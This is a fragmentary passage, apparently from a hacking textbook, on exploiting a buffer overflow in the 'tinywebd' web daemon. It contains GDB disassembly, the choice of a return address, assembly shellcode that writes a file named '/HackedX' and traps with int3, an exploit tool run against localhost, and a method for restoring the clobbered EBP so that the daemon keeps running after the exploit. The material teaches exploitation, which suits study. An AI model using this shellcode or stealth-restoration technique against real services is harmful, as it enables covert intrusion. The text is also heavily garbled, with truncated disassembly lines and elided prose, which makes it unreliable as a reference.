0x08048f4b <main+440>:  mov    DWORD PTR [esp],eax
0x08048f4e <main+443>:  call   0x8048860
0x08048f53 <main+448>:  cmp    eax,0xffffffff
0x08048f56 <main+451>:  jne    0x8048f64
0x08048f58 <main+453>:  mov    DWORD PTR [esp],0x804961a

0x08048f5f :
0x08048f64 :
0x08048f65 :
0x08048f6c :
0x08048f6f :
0x08048f73 :
0x08048f76 :
0x08048f7a :
0x08048f7f :
0x08048f82 :
0x08048f87 :
0x08048f8a :
0x08048f8e :
0x08048f90 :
0x08048f97 :
0x08048f9c :
0x08048fa1 :
0x08048fa5 :
0x08048fa8 :
0x08048fac :
0x08048faf :
0x08048fb2 :
0x08048fb7 :
End of assembler dump
...
Let’s
use 0x08048fb7 since this is the original return address used for the call to
handle_connection()
...

Look at the function prologue and epilogue for handle_connection()
...

(gdb) disass handle_connection
Dump of assembler code for function handle_connection:
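0x08048fb9 <handle_connection+0>:       push   ebp
0x08048fba <handle_connection+1>:       mov    ebp,esp
0x08048fbc <handle_connection+3>:       push   ebx
0x08048fbd <handle_connection+4>:       sub    esp,0x644
0x08048fc3 <handle_connection+10>:      lea    eax,[ebp-0x218]
0x08048fc9 <handle_connection+16>:      mov    DWORD PTR [esp+4],eax
0x08048fcd <handle_connection+20>:      mov    eax,DWORD PTR [ebp+8]
0x08048fd0 <handle_connection+23>:      mov    DWORD PTR [esp],eax
0x08048fd3 <handle_connection+26>:      call   0x8048cb0
0x08048fd8 <handle_connection+31>:      mov    DWORD PTR [ebp-0x620],eax
0x08048fde <handle_connection+37>:      mov    eax,DWORD PTR [ebp+12]
0x08048fe1 <handle_connection+40>:      movzx  eax,WORD PTR [eax+2]
0x08048fe5 <handle_connection+44>:      mov    DWORD PTR [esp],eax
0x08048fe8 <handle_connection+47>:      call   0x80488f0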

...

0x08049302 <handle_connection+841>:     call   0x8048850
0x08049307 :
0x0804930f :
0x08049312 :
0x08049315 :
0x0804931a :
0x08049320 :
0x08049321 :
0x08049322 :
End of assembler dump
...
Finally, 0x644 bytes are saved on the stack for these
stack variables by subtracting from ESP
...

The overwrite instructions are actually found in the recv_line() function; however, they write to data in the handle_connection() stack frame, so
the overwrite itself happens in handle_connection()
...
This means
that EBP and EBX will get mangled when the function epilogue executes
...
First, we need to assess how much collateral damage
is done by these extra instructions after the overwrite
...

The shellcode below uses an int3 instruction instead of exiting
...

mark_break
...

jmp short one
two:
pop ebx              ; Filename
xor ecx, ecx
mov BYTE [ebx+7], cl ; Null terminate filename
push BYTE 0x5        ; Open()
pop eax
mov WORD cx, 0x441   ; O_WRONLY|O_APPEND|O_CREAT
xor edx, edx
mov WORD dx, 0x180   ; S_IRUSR|S_IWUSR
int 0x80             ; Open file to create it
...

int3                 ; interrupt
one:
call two
db "/HackedX"

To use this shellcode, first get GDB set up to debug the tinyweb daemon
...
The goal is to restore the mangled registers to their original state
found at this breakpoint
...

reader@hacking:~/booksrc $
root
23497 0
...
0
reader 23506 0
...
0
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $

...
/tinywebd
2880
748 pts/1
R+
17:09 0:00 grep tinywebd
gcc -g tinywebd
...
/a
...
gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...

A program is being debugged already
...

(gdb) set dis intel
(gdb) x/5i main+533
0x8048fa8 <main+533>:   mov    DWORD PTR [esp+4],eax
0x8048fac <main+537>:   mov    eax,DWORD PTR [ebp-12]
0x8048faf <main+540>:   mov    DWORD PTR [esp],eax
0x8048fb2 <main+543>:   call   0x8048fb9 <handle_connection>
0x8048fb7 <main+548>:   jmp    0x8048f65 <main+466>
(gdb) break *0x8048fb2
Breakpoint 1 at 0x8048fb2: file tinywebd
...

(gdb) cont
Continuing
...
Then, in another terminal window, the exploit tool is
used to throw the new shellcode at it
...

reader@hacking:~/booksrc $ nasm mark_break
...
/xtool_tinywebd
...
0
...
1
target IP: 127
...
0
...
0
...
1] 80 (www) open
reader@hacking:~/booksrc $

Back in the debugging terminal, the first breakpoint is encountered
...
Then, execution continues
to the int3 instruction in the shellcode, which acts like a breakpoint
...

Breakpoint 1, 0x08048fb2 in main () at tinywebd
...

Program received signal SIGTRAP, Trace/breakpoint trap
...
However, an inspection of the instructions in main()’s
disassembly shows that EBX isn’t actually used
...
EBP, however, is used heavily, since it’s the point
of reference for all local stack variables
...

When EBP is restored to its original value, the shellcode should be able
to do its dirty work and then return back into main() as usual
...

(gdb) set dis intel
(gdb) x/5i main
0x8048d93

:
0x8048d94 :
0x8048d96 :
0x8048d99 :
0x8048d9c :
(gdb) x/5i main+533
0x8048fa8
